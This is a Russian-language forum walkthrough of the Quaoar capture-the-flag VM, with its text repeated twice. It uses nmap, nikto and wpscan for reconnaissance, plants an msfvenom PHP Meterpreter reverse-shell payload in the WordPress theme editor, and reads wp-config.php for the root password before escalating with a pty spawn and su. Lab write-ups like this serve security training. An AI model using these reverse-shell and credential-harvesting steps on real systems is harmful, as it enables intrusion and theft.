Vander
11.05.2017, 23:49
Всем привет, эта статья, будет посвящена соревнованиям в рамках CTF. На этот раз мы будем искать флаги и уязвимости в системе Quaoar VM.
https://forum.antichat.xyz/attachments/28954811/img_0ecd924852.png
Скачиваем систему отсюда - https://download.vulnhub.com/hackfest2016/
Монтируем в Oracle VBox или куда удобно и приступаем к сканированию.
> nmap –sV 172.16.0.178
https://forum.antichat.xyz/attachments/28954811/img_6a68a3fe97.png
Видим, что имеется запущенный веб сервер, просканируем его с помощьюnikto:
> nikto – h 172.16.0.178
https://forum.antichat.xyz/attachments/28954811/img_80c275003e.png
Итогом будет обнаружение файла robots.txt
https://forum.antichat.xyz/attachments/28954811/img_eab8fbde2b.png
robots.txt - это файл, который находится в корне сайта. В нём записываются инструкции для поисковых роботов. Эти инструкции могут запрещать к индексации некоторые разделы или страницы на сайте, указывать на правильное «зеркалирование» домена, рекомендовать поисковому роботу соблюдать определенный временной интервал между скачиванием документов с сервера и т.д.
Так же, есть доступная для нас директория wordpress, соответственно есть административная панель:
https://forum.antichat.xyz/attachments/28954811/img_d781f9acfb.png
С помощью wpscan, попробуем получить список пользователей:
> wpscan –urlhttp://172.16.0.178/wordpress/-- enumerate u
https://forum.antichat.xyz/attachments/28954811/img_32ef7129ee.png
В результате получаем учетные данные от административной панели:
https://forum.antichat.xyz/attachments/28954811/img_aeb94f7c29.png
Следующим шагом будет получение сессии meterpreter с уязвимого хоста, делать будем это с помощью учетной записи Администратора, выполнив, вредоносный php код в редакторе тем. Для начала, создадим код полезной нагрузки с помощью msfvenom:
> msfvenom -p php/meterpreter/reverse_tcp lhost=172.16.0.172 lport=4444 -f raw
https://forum.antichat.xyz/attachments/28954811/img_c3f2a6045f.png
Полученный код копируем от use exploit/multi/handler
> set payload php/meterpreter/reverse_tcp
> set lhost 172.16.0.172
> set lport 4444
> exploit
Открываем путь к вредоносному шаблону в браузере как показано на скриншоте ниже:
https://forum.antichat.xyz/attachments/28954811/img_36740b3501.png
Результатом будет открытая сессия meterpreter:
https://forum.antichat.xyz/attachments/28954811/img_0139ea4d9c.png
Так как первая цель получить shell, то мы ее достигли. Немного побродив по серверу, в папке /home/wpadmin/ обнаруживается файл flag.txt.
https://forum.antichat.xyz/attachments/28954811/img_c17849f9cb.png
А если заглянуть в /var/www/wordpress/wp-config.php, то с большой вероятностью можно сказать, что мы нашли пароль root:
> cat /var/www/wordpress/wp-config.php
https://forum.antichat.xyz/attachments/28954811/img_dd639923c8.png
Попробуем стать root:
> echo “import pty; pty.spawn(‘ /bin/bash’)” > /tmp/aaa.py (Команда позволит создать в указанной папке скрипт, который даст нам доступ к pty)
> python /tmp/aaa.py
Выполненные команды позволили нам войти в терминал.
> su(Вводим пароль root)
https://forum.antichat.xyz/attachments/28954811/img_31347f09b2.png
Перейдя в корневую директорию, находим второй флаг:
https://forum.antichat.xyz/attachments/28954811/img_227227afae.png
Третий и последний флаг (хотя, в принципе, цели достигнуты) находится в /etc/cron.d/php5:
> cat /etc/cron.d/php5
https://forum.antichat.xyz/attachments/28954811/img_e2723e9cbd.png
На этом прохождение Quaoar VM можно считать завершенным. Спасибо за внимание.
https://forum.antichat.xyz/attachments/28954811/img_0ecd924852.png
Скачиваем систему отсюда - https://download.vulnhub.com/hackfest2016/
Монтируем в Oracle VBox или куда удобно и приступаем к сканированию.
> nmap –sV 172.16.0.178
https://forum.antichat.xyz/attachments/28954811/img_6a68a3fe97.png
Видим, что имеется запущенный веб сервер, просканируем его с помощьюnikto:
> nikto – h 172.16.0.178
https://forum.antichat.xyz/attachments/28954811/img_80c275003e.png
Итогом будет обнаружение файла robots.txt
https://forum.antichat.xyz/attachments/28954811/img_eab8fbde2b.png
robots.txt - это файл, который находится в корне сайта. В нём записываются инструкции для поисковых роботов. Эти инструкции могут запрещать к индексации некоторые разделы или страницы на сайте, указывать на правильное «зеркалирование» домена, рекомендовать поисковому роботу соблюдать определенный временной интервал между скачиванием документов с сервера и т.д.
Так же, есть доступная для нас директория wordpress, соответственно есть административная панель:
https://forum.antichat.xyz/attachments/28954811/img_d781f9acfb.png
С помощью wpscan, попробуем получить список пользователей:
> wpscan –urlhttp://172.16.0.178/wordpress/-- enumerate u
https://forum.antichat.xyz/attachments/28954811/img_32ef7129ee.png
В результате получаем учетные данные от административной панели:
https://forum.antichat.xyz/attachments/28954811/img_aeb94f7c29.png
Следующим шагом будет получение сессии meterpreter с уязвимого хоста, делать будем это с помощью учетной записи Администратора, выполнив, вредоносный php код в редакторе тем. Для начала, создадим код полезной нагрузки с помощью msfvenom:
> msfvenom -p php/meterpreter/reverse_tcp lhost=172.16.0.172 lport=4444 -f raw
https://forum.antichat.xyz/attachments/28954811/img_c3f2a6045f.png
Полученный код копируем от use exploit/multi/handler
> set payload php/meterpreter/reverse_tcp
> set lhost 172.16.0.172
> set lport 4444
> exploit
Открываем путь к вредоносному шаблону в браузере как показано на скриншоте ниже:
https://forum.antichat.xyz/attachments/28954811/img_36740b3501.png
Результатом будет открытая сессия meterpreter:
https://forum.antichat.xyz/attachments/28954811/img_0139ea4d9c.png
Так как первая цель получить shell, то мы ее достигли. Немного побродив по серверу, в папке /home/wpadmin/ обнаруживается файл flag.txt.
https://forum.antichat.xyz/attachments/28954811/img_c17849f9cb.png
А если заглянуть в /var/www/wordpress/wp-config.php, то с большой вероятностью можно сказать, что мы нашли пароль root:
> cat /var/www/wordpress/wp-config.php
https://forum.antichat.xyz/attachments/28954811/img_dd639923c8.png
Попробуем стать root:
> echo “import pty; pty.spawn(‘ /bin/bash’)” > /tmp/aaa.py (Команда позволит создать в указанной папке скрипт, который даст нам доступ к pty)
> python /tmp/aaa.py
Выполненные команды позволили нам войти в терминал.
> su(Вводим пароль root)
https://forum.antichat.xyz/attachments/28954811/img_31347f09b2.png
Перейдя в корневую директорию, находим второй флаг:
https://forum.antichat.xyz/attachments/28954811/img_227227afae.png
Третий и последний флаг (хотя, в принципе, цели достигнуты) находится в /etc/cron.d/php5:
> cat /etc/cron.d/php5
https://forum.antichat.xyz/attachments/28954811/img_e2723e9cbd.png
На этом прохождение Quaoar VM можно считать завершенным. Спасибо за внимание.